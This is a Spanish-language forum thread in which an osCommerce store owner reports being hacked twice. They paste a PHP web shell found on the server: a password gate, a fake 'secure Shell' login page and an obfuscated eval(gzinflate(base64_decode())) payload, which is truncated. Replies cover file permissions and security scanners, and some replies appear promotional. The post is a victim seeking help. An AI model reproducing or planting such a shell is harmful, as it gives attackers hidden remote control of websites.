Foros del Web » Creando para Internet » Sistemas de gestión de contenidos »

OsCommerce Hackeado

Estas en el tema de OsCommerce Hackeado en el foro de Sistemas de gestión de contenidos en Foros del Web. Hola a todos! Me han hackeado mi OsCommerce dos veces en un día. Parece que se trata de un script automático de un tal ..:: ...
  #1 (permalink)  
Antiguo 07/04/2010, 03:16
Avatar de nolose  
Fecha de Ingreso: diciembre-2007
Ubicación: España
Mensajes: 165
Antigüedad: 16 años, 10 meses
Puntos: 2
OsCommerce Hackeado

Hola a todos!

Me han hackeado mi OsCommerce dos veces en un día.
Parece que se trata de un script automático de un tal ..:: BraIn Inc™ `09 ::.. he buscado en google pero no me aparece nada.

El caso es que en primera instancia me modificaron los títulos de las categorías de la izq (nose como), si con inyección de SQL o que…

Y en segundo, me han machacado el indez redirigiéndomelo a una página rarísima…
Mirando he visto un fichero que crea una sesión rarísima… lo dejo por aquí.

Código PHP:
<?php

@session_start();

$create_password true;

$password base64_decode("YnJAaW5AaGFjazNyLmMwbQ==");$pass=$_POST['pass'];if($pass==$password){$_SESSION['mailer']="$pass";}

if (
$_SERVER["HTTP_CLIENT_IP"]) $ip $_SERVER["HTTP_CLIENT_IP"];

else if(
$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip $_SERVER["HTTP_X_FORWARDED_FOR"];

else if(
$_SERVER["REMOTE_ADDR"]) $ip $_SERVER["REMOTE_ADDR"];

else 
$ip $_SERVER['REMOTE_ADDR'];

$ip=htmlspecialchars($ip);

if(
$create_password==true){

if(!isset(
$_SESSION['mailer']) or $_SESSION['mailer']!=$password){

die(
"<title>..:: BraIn  Inc™ `09 ::..</title>

<META http-equiv=\"content-type\" content=\"text/html;charset=iso-8859-1\">

<META content=\"mailer\" name=\"author\">

<META name=\"rating\" content=\"general\" />

<META http-equiv=\"pragma\" content=\"cache\" />

<META http-equiv=\"cache-control\" content=\"cache\" />

<META http-equiv=\"cache-control\" content=\"must-revalidate\" />

<META http-equiv=\"cache-control\" content=\"proxy-revalidate\" />

<META name=\"MSSmartTagsPreventParsing\" content=\"true\" />

<META name=\"robots\" content=\"all,index,follow\" />

<META name=\"googlebot\" content=\"all,index,follow\" />

<META name=\"allow-search\" content=\"yes\" />

<META name=\"audience\" content=\"all\" />

<META name=\"revisit\" content=\"2 days\" />

<META name=\"revisit-after\" content=\"2 days\" />

<META name=\"author\" content=\"mailer\" />

<META name=\"copyright\" content=\"mailer\" />

<META name=\"creator\" content=\"mailer\" />

<META name=\"generator\" content=\"mailer\" />

<META http-equiv=\"Reply-to\" content=\"[email protected]\" />

<META name=\"distribution\" content=\"global\" />

<META name=\"classification\" content=\"..:: BraIn  Inc™ `09 ::.., Powered by mailer\" />

<META name=\"document-classification\" content=\"general\" />

<META name=\"rating\" content=\"general\" />

<meta name=\"description\" content=\"..:: BraIn  Inc™ `09 ::.. Powered by mailer\" />

<META content=\"index, follow\" name=\"robots\">

<META content=\"..:: BraIn  Inc™ `09 ::..,mailer\" name=\"keywords\">

<META name=\"dc.title\" content=\"..:: BraIn  Inc™ `09 ::..\" />

<META name=\"dc.creator.e-mail\" content=\"[email protected]\" />

<META name=\"dc.creator.name\" content=\"mailer\" />

<body text=\"#FFFFFF\" bgcolor=\"#000000\" background=\"black\">

<br><br><br><br><br><br><br><br><br><br><br><center>

<table width=100 bgcolor=\"black\" border=1 bordercolor=\"white\"><tr><td>

<font size=1 face=verdana><center><b><font color=red>

..:: BraIn secure Shell ::..</font></a><br><br></b></center>

<form method=post>Password:<br><input type=password name=pass size=30 tabindex=1>

</form><font color=red><b>Host:</b> "
.$_SERVER["HTTP_HOST"]."<br>

<font color=red><b>IP:</b> "
.gethostbyname($_SERVER["HTTP_HOST"])."<br>

<font color=red><b>Your ip:</b> "
.$ip."</td></tr></table>");}}

eval(
gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIoquKomS378fdP7iIi7ivHRM3sb1zOzM7s3EXd3EXsZeZeBTqRVKy7JnZXblbIgFkIpEAEolEIuGMnE5gh6Wi5QRj1zzr2L7v+UGxwprl1tdfOcnsIDT9cDJOFKNvHd8ee37ojAaljc7qs2eYUa8/cAYjz7c7k8D2O2YXCpT2XrzcwMwHgLkTOkO74zpDJyw1VOLQHDi9zruJF9pBx5+MsJDIVhTxOl1vUKxsveS1RZmQrEhMwA3N0459avcmoeONqHpR5OuvCs6YtVmhs7vx4tXGi/3ii43n23vQlvX1F8VDXsJ0XW8K8OGVK21m+r55BhjPgnduscL/OvChH47hd2/iY6ozNPFb4PWO7TDAYgEvjoVDu4hVC7Rj3xv45jDCPOj1EBH+ci34NT5CVGObEINY5bp/w8='  ..............  )))

 
?>
Alguien sabe algo??? Gracias!!!
  #2 (permalink)  
Antiguo 07/04/2010, 03:20
Avatar de nolose  
Fecha de Ingreso: diciembre-2007
Ubicación: España
Mensajes: 165
Antigüedad: 16 años, 10 meses
Puntos: 2
Respuesta: OsCommerce Hackeado

PD: Tenia la carpera www con permisos 777, lo acabo de modificar a 755 y nose si debo hacerlo tambien con el index.php y cn todos los ficheros a 777 (o si eso afectará al correcto funcionamiento de la administración de oscommerce)
  #3 (permalink)  
Antiguo 07/04/2010, 04:05
 
Fecha de Ingreso: abril-2010
Mensajes: 2
Antigüedad: 14 años, 7 meses
Puntos: 0
Respuesta: OsCommerce Hackeado

Hola nolose
Yo tenia problemas con la seguridad de mi servidor y mi sitio web, pero hace poco he leído por este foro una nueva aplicación llamada Security Guardian, la probé y me ha escaneado haciendo una serie de pruebas de intrusión, de tal manera que me ha encontrado vulnerabilidades SQL Injection y Cross Site Scripting. El informe de las vulnerabilidades me informaba de como solucionar los problemas.
Security Guardian por lo que he leído comprueba muchas cosas y no solo lo que me ha detectado. Si lo quieres probar entra aquí: http://www.security-guardian.com
Yo te recomiendo que lo pruebes a nosotros nos sirvió mucho.
Espero que te sirva.
Saludos

Última edición por Serg90; 07/04/2010 a las 04:31
  #4 (permalink)  
Antiguo 15/05/2010, 16:39
Avatar de humbertoj
Usuario no validado
 
Fecha de Ingreso: enero-2002
Ubicación: Carabobo, Venezuela.
Mensajes: 68
Antigüedad: 22 años, 9 meses
Puntos: 0
Respuesta: OsCommerce Hackeado

OSEA... habrá otra alternativa de seguridad???????

No es posible que solo sugieran esa... yo estoy interesado en conocerla,
e invito a los foreros a ayudarnos.. por favor

Como dar seguridad en aplicaciones oscommerce
  #5 (permalink)  
Antiguo 29/06/2010, 12:00
 
Fecha de Ingreso: junio-2010
Mensajes: 1
Antigüedad: 14 años, 4 meses
Puntos: 0
OsCommerce Hackeado

humbertoj, podrías seguir owasp.org, en esa web hay documentación de como securizar los servidores y se quiere probar usar cualquier herramientas de test de intrusiones, pues hay: Appscan, controlscan.com, security-guardian.com...
  #6 (permalink)  
Antiguo 03/01/2011, 17:41
 
Fecha de Ingreso: septiembre-2009
Mensajes: 17
Antigüedad: 15 años, 2 meses
Puntos: 0
Respuesta: OsCommerce Hackeado

Cita:
Iniciado por Trystan Ver Mensaje
humbertoj, podrías seguir owasp.org, en esa web hay documentación de como securizar los servidores y se quiere probar usar cualquier herramientas de test de intrusiones, pues hay: Appscan, controlscan.com, security-guardian.com...
Perfecto el test que hace Qualys.com y además es gratuito. En fin, para los pequeños negocios va muy bien ya que es a quienes nos atacan normalmente estos cabrones. Alguien sabe como romper los permisos de los archivos malware que coloca esta gentuza. He limpiado todos los codigos... trabajo de horas y horas, pero me falta eliminar los archivos que ha creado el hacker con el "bicho", no me permite ni modificar permisos ni eliminarlos. ¿alguien sabe como hacerlo?
  #7 (permalink)  
Antiguo 23/12/2012, 01:46
vtj
 
Fecha de Ingreso: febrero-2011
Mensajes: 613
Antigüedad: 13 años, 9 meses
Puntos: 40
Respuesta: OsCommerce Hackeado

Ciao

Si a alguien le interesa, ofrezco mi servicio de seguridad previa para Oscommerce que puede incluir tambien la restauración de un eshop hackeado.

Etiquetas: oscommerce
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 04:29.